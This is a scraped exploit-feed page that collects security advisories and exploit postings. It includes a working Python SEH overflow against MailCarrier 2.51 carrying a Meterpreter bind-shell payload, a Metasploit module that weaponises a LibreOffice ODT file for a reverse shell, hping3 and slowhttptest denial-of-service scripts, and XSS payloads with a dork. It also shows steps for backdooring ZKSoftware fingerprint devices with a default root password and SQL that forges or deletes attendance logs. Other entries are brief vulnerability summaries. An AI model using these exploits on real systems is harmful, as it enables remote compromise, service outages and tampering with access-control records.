Quantcast
Channel: Exploit Collector
Viewing all 13315 articles
Browse latest View live

MailCarrier 2.51 RETR Buffer Overflow

$
0
0

MailCarrier version 2.51 POP3 RETR command remote SEH buffer overflow exploit.


MD5 | 62118c345ddaf1021e9fd1488325157b

#!/usr/bin/python
# Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "RETR" command(POP3)
# Date: 16/04/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.tabslab.com/
# Version: 2.51
# Software Link: N.A
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP Prof SP3 ENG x86
# CVE: TBC from Mitre
# Created for the Telspace Internship 2019 - SEH Exploit
# POC
# 1.) Change ip, username, password and port in code
# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
#0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll)
#N.B For all Mail Carrier exploits, increase/decrease the initial EIP overwrite buffer if your target ip is larger/smaller in digits.
#Crash at 6174
import sys
import socket
import time

#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
shellcode = ("\x89\xe1\xdb\xcb\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x69\x6c\x78\x68\x6f\x72\x47\x70\x37\x70\x53\x30\x31\x70\x4f"
"\x79\x58\x65\x66\x51\x49\x50\x50\x64\x4c\x4b\x50\x50\x56\x50"
"\x4e\x6b\x56\x32\x74\x4c\x6e\x6b\x50\x52\x36\x74\x6c\x4b\x63"
"\x42\x36\x48\x66\x6f\x58\x37\x52\x6a\x35\x76\x76\x51\x69\x6f"
"\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x75\x52\x64\x6c\x47\x50\x69"
"\x51\x4a\x6f\x34\x4d\x37\x71\x38\x47\x58\x62\x6c\x32\x62\x72"
"\x70\x57\x6c\x4b\x52\x72\x42\x30\x4e\x6b\x53\x7a\x65\x6c\x6e"
"\x6b\x30\x4c\x42\x31\x33\x48\x78\x63\x31\x58\x55\x51\x4b\x61"
"\x66\x31\x6c\x4b\x50\x59\x37\x50\x67\x71\x38\x53\x6e\x6b\x33"
"\x79\x65\x48\x6a\x43\x75\x6a\x62\x69\x6c\x4b\x56\x54\x6e\x6b"
"\x37\x71\x38\x56\x55\x61\x39\x6f\x4c\x6c\x4a\x61\x78\x4f\x46"
"\x6d\x37\x71\x49\x57\x66\x58\x69\x70\x31\x65\x6b\x46\x55\x53"
"\x51\x6d\x69\x68\x65\x6b\x61\x6d\x51\x34\x74\x35\x6a\x44\x70"
"\x58\x6c\x4b\x30\x58\x55\x74\x65\x51\x6b\x63\x61\x76\x6e\x6b"
"\x76\x6c\x30\x4b\x6e\x6b\x71\x48\x47\x6c\x33\x31\x7a\x73\x4c"
"\x4b\x55\x54\x6c\x4b\x77\x71\x6e\x30\x4b\x39\x32\x64\x34\x64"
"\x36\x44\x61\x4b\x51\x4b\x45\x31\x30\x59\x52\x7a\x42\x71\x59"
"\x6f\x69\x70\x53\x6f\x33\x6f\x72\x7a\x4c\x4b\x34\x52\x78\x6b"
"\x6c\x4d\x63\x6d\x71\x78\x50\x33\x77\x42\x55\x50\x53\x30\x33"
"\x58\x70\x77\x70\x73\x30\x32\x31\x4f\x61\x44\x42\x48\x30\x4c"
"\x54\x37\x76\x46\x34\x47\x59\x6f\x78\x55\x78\x38\x4c\x50\x33"
"\x31\x65\x50\x35\x50\x35\x79\x48\x44\x50\x54\x30\x50\x75\x38"
"\x56\x49\x6f\x70\x62\x4b\x75\x50\x69\x6f\x68\x55\x73\x5a\x74"
"\x4b\x42\x79\x62\x70\x79\x72\x59\x6d\x53\x5a\x63\x31\x52\x4a"
"\x67\x72\x65\x38\x6b\x5a\x74\x4f\x79\x4f\x69\x70\x69\x6f\x48"
"\x55\x5a\x37\x31\x78\x44\x42\x73\x30\x33\x31\x4d\x6b\x6e\x69"
"\x38\x66\x70\x6a\x76\x70\x70\x56\x72\x77\x53\x58\x6f\x32\x59"
"\x4b\x46\x57\x73\x57\x39\x6f\x38\x55\x6d\x55\x39\x50\x43\x45"
"\x61\x48\x53\x67\x65\x38\x4e\x57\x59\x79\x66\x58\x4b\x4f\x6b"
"\x4f\x59\x45\x43\x67\x75\x38\x51\x64\x58\x6c\x77\x4b\x39\x71"
"\x69\x6f\x49\x45\x32\x77\x4d\x47\x42\x48\x43\x45\x32\x4e\x52"
"\x6d\x50\x61\x4b\x4f\x39\x45\x52\x4a\x67\x70\x53\x5a\x74\x44"
"\x73\x66\x42\x77\x53\x58\x43\x32\x7a\x79\x39\x58\x63\x6f\x79"
"\x6f\x6e\x35\x4d\x53\x4c\x38\x65\x50\x73\x4e\x46\x4d\x4e\x6b"
"\x66\x56\x30\x6a\x57\x30\x65\x38\x33\x30\x62\x30\x77\x70\x75"
"\x50\x63\x66\x70\x6a\x65\x50\x52\x48\x61\x48\x39\x34\x61\x43"
"\x69\x75\x69\x6f\x38\x55\x7a\x33\x50\x53\x31\x7a\x45\x50\x66"
"\x36\x51\x43\x76\x37\x31\x78\x43\x32\x69\x49\x6f\x38\x51\x4f"
"\x4b\x4f\x39\x45\x4d\x53\x69\x68\x43\x30\x63\x4e\x73\x37\x67"
"\x71\x4a\x63\x44\x69\x5a\x66\x73\x45\x38\x69\x6a\x63\x6f\x4b"
"\x4a\x50\x4c\x75\x4e\x42\x42\x76\x33\x5a\x37\x70\x63\x63\x69"
"\x6f\x78\x55\x41\x41")

buffer = "A" * 6174 + "\xeb\x11\x90\x90" + "\x0c\x11\x0d\x1b" + "\x90" * 20 + shellcode + "D" * (10000-6882)

print "[*] Mail Server 2.51 POP3 Buffer Overflow in RETR command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.0.150", 110))
print s.recv(1024)
print "[*] Sending USERNAME\r\n"
s.send('USER test' + '\r\n')
print s.recv(1024)
print "[*] Sending PASSWORD\r\n"
s.send('PASS test' + '\r\n')
print s.recv(1024)
s.send('RETR ' + buffer + '\r\n')
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, check for meterpreter shell on target ip port 443!"


Microsoft Windows CSRSS SxSSrv Cached Manifest Privilege Escalation

$
0
0

On Microsoft Windows, the SxS manifest cache in CSRSS uses a weak key allowing an attacker to fill a cache entry for a system binary leading to elevation of privilege.


MD5 | 9f3bf345b40d34f07347582eafa1a2c3


Microsoft Windows LUAFV Delayed Virtualization MAXIMUM_ACCESS DesiredAccess Privilege Escalation

$
0
0

On Microsoft Windows, the LUAFV driver reuses the file's create request DesiredAccess parameter, which can include MAXIMUM_ACCESS, when virtualizing a file resulting in elevation of privilege.


MD5 | 3cb71794adeb390f66e06400fdb22445


Microsoft Windows LUAFV Delayed Virtualization Cross Process Handle Duplication Privilege Escalation

$
0
0

On Microsoft Windows, the LUAFV driver doesn't take into account a virtualized handle being duplicated to a more privileged process resulting in elevation of privilege.


MD5 | a1fec4a7c7f902a8a18eb1e16515b938


Microsoft Windows LUAFV LuafvCopyShortName Arbitrary Short Name Privilege Escalation

$
0
0

On Microsoft Windows, the LUAFV driver bypasses security checks to copy short names during file virtualization which can be tricked into writing an arbitrary short name leading to elevation of privilege.


MD5 | dd49da95f51474f4c5e19bc2d1015952


Microsoft Windows LUAFV NtSetCachedSigningLevel Device Guard Bypass

$
0
0

On Microsoft Windows, the NtSetCachedSigningLevel system call can be tricked by the operation of LUAFV to apply a cached signature to an arbitrary file leading to a bypass of code signing enforcement under UMCI with Device Guard.


MD5 | c842665e8c982e999825c50d9c78df7a


Microsoft Windows LUAFV Delayed Virtualization Cache Manager Poisoning Privilege Escalation

$
0
0

On Microsoft Windows, the LUAFV driver can confuse the cache and memory manager to replace the contents of privileged file leading to elevation of privilege.


MD5 | 77b361493b8c0d502d033818bd814a0b


Microsoft Windows LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition

$
0
0

On Microsoft Windows, the LUAFV driver has a race condition in the LuafvPostReadWrite callback if delay virtualization has occurred during a read leading to the SECTION_OBJECT_POINTERS value being reset to the underlying file resulting in elevation of privilege.


MD5 | 6d02ec8a84f62a9cf2ee150b26a8f78a



Bouncy Castle CVE-2018-1000180 Security Weakness

$
0
0


Bouncy Castle is prone to a security weakness.
Successfully exploiting this issue will allow attackers to perform unauthorized actions; this may aid in launching further attacks.

Information

Bugtraq ID: 106567
Class: Design Error
CVE: CVE-2018-1000180

Remote: Yes
Local: No
Published: Apr 18 2018 12:00AM
Updated: Apr 17 2019 09:00AM
Credit: Bernd Eckenfels
Vulnerable: Redhat Virtualization 4
Redhat Software Collections for RHEL 0
Redhat Satellite 6
Redhat Openshift Application Runtimes 1.0
Redhat JBoss Fuse 6.0
Oracle Weblogic Server 12.2.1.3
Oracle WebCenter Portal 12.2.1.3.0
Oracle WebCenter Portal 11.1.1.9.0
Oracle SOA Suite 12.2.1.3.0
Oracle SOA Suite 12.1.3.0.0
Oracle Retail Xstore Point of Service 7.1
Oracle Retail Xstore Point of Service 7.0
Oracle Retail Convenience and Fuel POS Software 2.8.1
Oracle PeopleSoft Enterprise PeopleTools 8.57
Oracle PeopleSoft Enterprise PeopleTools 8.56
Oracle PeopleSoft Enterprise PeopleTools 8.55
Oracle Managed File Transfer 12.2.1.3.0
Oracle Managed File Transfer 12.1.3.0.0
Oracle Enterprise Repository 12.1.3.0.0
Oracle Communications WebRTC Session Controller 7.1
Oracle Communications WebRTC Session Controller 7.0
Oracle Communications Converged Application Server 7.0
Oracle Communications Application Session Controller 3.8
Oracle Communications Application Session Controller 3.7.1
Oracle Business Transaction Management 12.1.0
Oracle Business Process Management Suite 12.2.1.3.0
Oracle Business Process Management Suite 12.1.3.0.0
Oracle Business Process Management Suite 11.1.1.9.0
Oracle API Gateway 11.1.2.4.0
Bouncycastle Fips Java Api 1.0.1
Bouncycastle Fips Java Api 1.0
Bouncycastle Bouncy Castle 1.59
Bouncycastle Bouncy Castle 1.54


Not Vulnerable: Oracle Communications WebRTC Session Controller 7.2
Oracle Communications Converged Application Server 7.0.0.1
Bouncycastle Fips Java Api 1.0.2
Bouncycastle Bouncy Castle 1.60 Beta4


Exploit


The researcher has created a proof-of-concept to demonstrate the issue. Please see the references for more information.


    Backdooring-ZMM100-FingerPrint-Devices - AuthBypass & Auto Backdooring Devices

    $
    0
    0

    Hacking Embedded Devices :
    Hardware platform ZMM100 :
    The fingerprint access control device Made by ZKSoftware.
      • Default User/Password : root:solokey

    Scripts :
    • pwnit.py : Automated tool for hacking devices.
    • hell : second backdoor.
    • leak-data.sh : third backdoor.

    YouTube Video :


    Change root password :
    passwd
    { enter new root password }
    cp /etc/passwd /mnt/mtdblock
    cp /etc/passwd /mnt/mtdblock/data/

    More Info :
    This directory "mnt/ramdisk" contains : picture.jpg , finger.bmp.
    Web directory "/mnt/mtdblock/service/webserver" contains : some shitty csl web files lol.
    Database here : "/mnt/mtdblock/data/ZKDB.db"
    Important tables : "ATT_LOGS" ( user logs ) , "USER_INFO" ( user informations ) , "fptemplate10" ( finger print data ).
    -- https://i.imgur.com/yNfVNSH.png ( ATT_LOGS ).
    -- https://i.imgur.com/ujiIqzf.png ( USER_INFO ).
    -- https://i.imgur.com/ilGwFZB.png ( fptemplate10 ).

    > https://github.com/adrobinoga/zk-protocol/blob/master/sections/data-user.md#example-of-a-template-entry
    SQLite ELF File : "/mnt/mtdblock/data/sqlite3_arm" --> ./sqlite3_arm ZKDB.db;

    Insert / Delete DATA :
    • Insert : ./sqlite3_arm ZKDB.db "INSERT INTO ATT_LOG VALUES (null,1224,15,'2019-04-12T00:00:00','0','0',null,null,null,null,0);"
    • Delete log : ./sqlite3_arm ZKDB.db "DELETE FROM ATT_LOG WHERE ID = 1224;"
    Shit its amazing 3:) !

    References :
    https://blog.infobytesec.com/2014/07/perverting-embedded-devices-zksoftware_2920.htmlhttps://github.com/linsir/pyscripts/tree/master/zkteco_check_in


    2 Plan Team 1.0.4 Cross Site Scripting

    $
    0
    0

    2 Plan Team version 1.0.4 suffers from a cross site scripting vulnerability.


    MD5 | 3c0b8ec591a4e6cc09486fd5e2af39d7

    ====================================================================================================================================
    | # Title : 2 Plan Team 1.0.4 - XSS Vulnerability |
    | # Author : indoushka |
    | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) |
    | # Vendor : http://2-plan.com/ |
    | # Dork : "Login @ 2-plan" |
    ====================================================================================================================================

    poc :


    [+] Dorking İn Google Or Other Search Enggine.

    [+] Use payload : install.php?locale=pl'"()%26%25<acx><script>alert(/indoushka/);</script>

    [+] http://127.0.0.1/biz.ht/install.php?locale=pl'"()%26%25<acx><script>alert(/indoushka/);</script>


    Greetings to :=========================================================================================================================
    |
    jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh |
    |
    =======================================================================================================================================

    WordPress Download Manager 2.9.93 Cross Site Scripting

    $
    0
    0

    WordPress Download Manager plugin version 2.9.93 suffers from a cross site scripting vulnerability.


    MD5 | 6e44af3b213e221b3464bac7bebfa674

    * Exploit Title: WordPress Download Manager Cross-site Scripting
    * Discovery Date: 2019-04-13
    * Exploit Author: ThuraMoeMyint
    * Author Link: https://twitter.com/mgthuramoemyint
    * Vendor Homepage: https://www.wpdownloadmanager.com
    * Software Link: https://wordpress.org/plugins/download-manager
    * Version: 2.9.93
    * Category: WebApps, WordPress

    Description
    --

    In the pro features of the WordPress download manager plugin, there is a Category Short-code feature witch can use to sort categories with order by a function which will be used as ?orderby=title,publish_date .
    By adding parameter "> and add any XSS payload , the xss payload will execute.

    To reproduce,

    1.Go to the link where we can find ?orderby
    2.Add parameters >” and give simple payload like <script>alert(1)</script>
    3.The payload will execute.
    --

    PoC
    --

    <div class="btn-group btn-group-sm pull-right"><button type="button" class="btn btn-primary" disabled="disabled">Order &nbsp;</button><a class="btn btn-primary" href="https://demo.com/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=asc">Asc</a><a class="btn btn-primary" href="https://demo..com/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=desc">Desc</a></div>

    --
    Demo
    --
    https://demo.wpdownloadmanager.com/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc
    --


    Another reflected cross-site scripting via advance search

    https://demo.wpdownloadmanager.com/wpdmpro/advanced-search/

    https://demo.wpdownloadmanager.com/wpdmpro/advanced-search/?search[publish_date]=2019-04-17+to+2019-04-17%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search[update_date]=&search[view_count]=&search[download_count]=&search[package_size]=&search[order_by]=&search[order]=ASC&q=a




    ASUS HG100 Denial Of Service

    $
    0
    0

    ASUS HG100 suffers from a denial of service vulnerability.


    MD5 | ea2e4abda8fc79168565125e50e6b8df

    # Exploit Title:ASUS HG100 devices denial of service(DOS) via IPv4 packets/SlowHTTPDOS 
    # Date: 2019-04-14 # Exploit Author: YinT Wang;
    # Vendor Homepage: www.asus.com
    # Version: Hardware version: HG100 、Firmware version: 1.05.12
    # Tested on: Currnet 1.05.12
    # CVE : CVE-2018-11492

    1. Description
    The attack at same Local-Network-area could crash the device via the Hping3 or Slowhttptest(which is not include in the CVE-2018-11492).

    2.Proof of Concept
    Just Execute the following script in kali which could crash the devices

    1. IPv4 packet and in result of devices crash.which written in linux script.

    #needed to co-operate with hping3 tool
    #with the time period at least 220s which could cause web server of HG100 devices crash
    #!/bin/bash
    read -p "enter the ip of HG100 here " url
    hping3 -V -c 10000 -S -w 64 --flood --rand-source $url
    sleep 220
    echo "Hping3 –V –c 10000 –S –w 64 –flood –rand-source $url time 220s"
    exit 0

    2.Slowhttp test and caused the devices crash.which written in linux script.

    #needed to co-operate with slowhttptest tool
    #with the time period 600s which could cause web server of HG100 devices crash
    #!/bin/bash
    read -p "enter the ip of HG100 with port here ex: http://x.x.x.x:123 " url
    slowhttptest -H -R -c 10000 -l 600 -u $url
    sleep 600
    echo "slowhttptest -H -R -c 10000 -l 600 -u $url time 600s"
    exit 0

    DHCP Server 2.5.2 Denial Of Service

    $
    0
    0

    DHCP Server version 2.5.2 suffers from a denial of service vulnerability.


    MD5 | 3255794f28d7d8218082aed5dc8eebf5

    #Exploit Title: DHCP Server 2.5.2 - Denial of Service (PoC)
    #Discovery by: Victor Mondragón
    #Discovery Date: 2019-04-16
    #Vendor Homepage: http://www.dhcpserver.de/cms/
    #Software Link: http://www.dhcpserver.de/cms/wp-content/plugins/download-attachments
    #Tested Version: 2.5.2
    #Tested on: Windows 7 x32 Service Pack 1

    #Steps to produce the crash:
    #1.- Run python code: DHCPSRV_2.5.2.py
    #2.- Open dhcp.txt and copy content to clipboard
    #2.- Open dhcpwiz.exe
    #3.- Click Next
    #4.- In Network Interface cards Select "Local Area Connection" and click on Next
    #5.- In Supported Protocols click on Next
    #6.- In Configuring DHCP for Interface Select "DHCP Options"
    #7.- Select "Bootfile" field and Paste ClipBoard
    #8.- Crashed

    cod = "\x41" * 6000
    f = open('dhcp.txt', 'w')
    f.write(cod)
    f.close()

    OAMbuster Multi-Threaded CVE-2018-2879 Scanner


    Oracle Java Runtime Environment sc_FindExtrema4 Heap Corruption

    $
    0
    0

    A heap corruption was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType, implemented in a proprietary t2k library.


    MD5 | 74f5b83ac15a386d0e98eb59705c2a66


    Oracle Java Runtime Environment GlyphIterator::setCurrGlyphID Heap Corruption

    $
    0
    0

    A heap corruption was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts.


    MD5 | 074ca17f20fc3585508db683bc708cad


    LibreOffice Macro Code Execution

    $
    0
    0

    This Metasploit module generates an ODT file with a mouse over event that when triggered, will execute arbitrary code.


    MD5 | 931f1709eb9d70968931648408852ccd

    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    class MetasploitModule < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::FILEFORMAT
    include Msf::Exploit::Powershell
    include Msf::Exploit::CmdStager

    def initialize(info = {})
    super(update_info(info,
    'Name' => 'LibreOffice Macro Code Execution',
    'Description' => %q{
    LibreOffice comes bundled with sample macros written in Python and
    allows the ability to bind program events to them. A macro can be tied
    to a program event by including the script that contains the macro and
    the function name to be executed. Additionally, a directory traversal
    vulnerability exists in the component that references the Python script
    to be executed. This allows a program event to execute functions from Python
    scripts relative to the path of the samples macros folder. The pydoc.py script
    included with LibreOffice contains the tempfilepager function that passes
    arguments to os.system, allowing RCE.

    This module generates an ODT file with a mouse over event that
    when triggered, will execute arbitrary code.
    },
    'License' => MSF_LICENSE,
    'Author' =>
    [
    'Alex Inführ', # Vulnerability discovery and PoC
    'Shelby Pace' # Metasploit Module
    ],
    'References' =>
    [
    [ 'CVE', '2018-16858' ],
    [ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]
    ],
    'Platform' => [ 'win', 'linux' ],
    'Arch' => [ ARCH_X86, ARCH_X64 ],
    'Targets' =>
    [
    [
    'Windows',
    {
    'Platform' => 'win',
    'Arch' => [ ARCH_X86, ARCH_X64 ],
    'Payload' => 'windows/meterpreter/reverse_tcp',
    'DefaultOptions' => { 'PrependMigrate' => true }
    }
    ],
    [
    'Linux',
    {
    'Platform' => 'linux',
    'Arch' => [ ARCH_X86, ARCH_X64 ],
    'Payload' => 'linux/x86/meterpreter/reverse_tcp',
    'DefaultOptions' => { 'PrependFork' => true },
    'CmdStagerFlavor' => 'printf',
    }
    ]
    ],
    'DisclosureDate' => "Oct 18, 2018",
    'DefaultTarget' => 0
    ))

    register_options(
    [
    OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
    ])
    end

    def gen_windows_cmd
    opts =
    {
    :remove_comspec => true,
    :method => 'reflection',
    :encode_final_payload => true
    }
    @cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)
    @cmd << '&& echo'
    end

    def gen_linux_cmd
    @cmd = generate_cmdstager.first
    @cmd << '&& echo'
    end

    def gen_file(path)
    text_content = Rex::Text.rand_text_alpha(10..15)

    # file from Alex Inführ's PoC post referenced above
    fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))
    libre_file = ERB.new(fodt_file).result(binding())
    libre_file
    rescue Errno::ENOENT
    fail_with(Failure::NotFound, 'Cannot find template file')
    end

    def exploit
    path = '../../../program/python-core-3.5.5/lib/pydoc.py'
    if datastore['TARGET'] == 0
    gen_windows_cmd
    elsif datastore['TARGET'] == 1
    gen_linux_cmd
    else
    fail_with(Failure::BadConfig, 'A formal target was not chosen.')
    end
    fodt_file = gen_file(path)

    file_create(fodt_file)
    end
    end

    Microsoft Windows Win32k CVE-2019-0859 Local Privilege Escalation Vulnerability

    $
    0
    0


    Microsoft Windows is prone to a local privilege-escalation vulnerability.

    An attacker can exploit this issue to execute arbitrary code with elevated privileges. Failed exploit attempts may result in a denial of service condition.

    Information

    Bugtraq ID: 107763
    Class: Design Error
    CVE: CVE-2019-0859

    Remote: No
    Local: Yes
    Published: Apr 09 2019 12:00AM
    Updated: Apr 18 2019 12:00PM
    Credit: Vasily Berdnikov and Boris Larin of Kaspersky Lab
    Vulnerable: Microsoft Windows Server 2019 0
    Microsoft Windows Server 2016 0
    Microsoft Windows Server 2012 R2 0
    Microsoft Windows Server 2012 0
    Microsoft Windows Server 2008 R2 for x64-based Systems SP1
    Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
    Microsoft Windows Server 2008 for x64-based Systems SP2
    Microsoft Windows Server 2008 for Itanium-based Systems SP2
    Microsoft Windows Server 2008 for 32-bit Systems SP2
    Microsoft Windows Server 1803 0
    Microsoft Windows Server 1709 0
    Microsoft Windows RT 8.1
    Microsoft Windows 8.1 for x64-based Systems 0
    Microsoft Windows 8.1 for 32-bit Systems 0
    Microsoft Windows 7 for x64-based Systems SP1
    Microsoft Windows 7 for 32-bit Systems SP1
    Microsoft Windows 10 Version 1809 for x64-based Systems 0
    Microsoft Windows 10 Version 1809 for ARM64-based Systems 0
    Microsoft Windows 10 Version 1809 for 32-bit Systems 0
    Microsoft Windows 10 Version 1803 for x64-based Systems 0
    Microsoft Windows 10 Version 1803 for ARM64-based Systems 0
    Microsoft Windows 10 Version 1803 for 32-bit Systems 0
    Microsoft Windows 10 version 1709 for x64-based Systems 0
    Microsoft Windows 10 Version 1709 for ARM64-based Systems 0
    Microsoft Windows 10 version 1709 for 32-bit Systems 0
    Microsoft Windows 10 version 1703 for x64-based Systems 0
    Microsoft Windows 10 version 1703 for 32-bit Systems 0
    Microsoft Windows 10 Version 1607 for x64-based Systems 0
    Microsoft Windows 10 Version 1607 for 32-bit Systems 0
    Microsoft Windows 10 for x64-based Systems 0
    Microsoft Windows 10 for 32-bit Systems 0


    Not Vulnerable:

    Exploit


    Reports indicate that this issue is being exploited in the wild. Please see the references for more information.
    The researcher has created a proof-of-concept to demonstrate the issue. Please see the references for more information.


      Evernote 7.9 Path Traversal / Code Execution

      $
      0
      0

      Evernote version 4.9 suffers from a path traversal that can allow for code execution.


      MD5 | d4904d2fd1cf06efcec045568d6f2691

      # Exploit Title: Code execution via path traversal
      # Date: 17-04-2019
      # Exploit Author: Dhiraj Mishra
      # Vendor Homepage: http://evernote.com/
      # Software Link: https://evernote.com/download
      # Version: 7.9
      # Tested on: macOS Mojave v10.14.4
      # CVE: CVE-2019-10038
      # References:
      # https://nvd.nist.gov/vuln/detail/CVE-2019-10038
      # https://www.inputzero.io/2019/04/evernote-cve-2019-10038.html

      Summary:
      A local file path traversal issue exists in Evernote 7.9 for macOS which
      allows an attacker to execute arbitrary programs.

      Technical observation:
      A crafted URI can be used in a note to perform this attack using file:///
      has an argument or by traversing to any directory like
      (../../../../something.app).

      Since, Evernote also has a feature of sharing notes, in such case attacker
      could leverage this vulnerability and send crafted notes (.enex) to the
      victim to perform any further attack.

      Patch:
      The patch for this issue is released in Evernote 7.10 Beta 1 for macOS
      [MACOSNOTE-28840]. Also, the issue is tracked by CVE-2019-10038.

      Viewing all 13315 articles
      Browse latest View live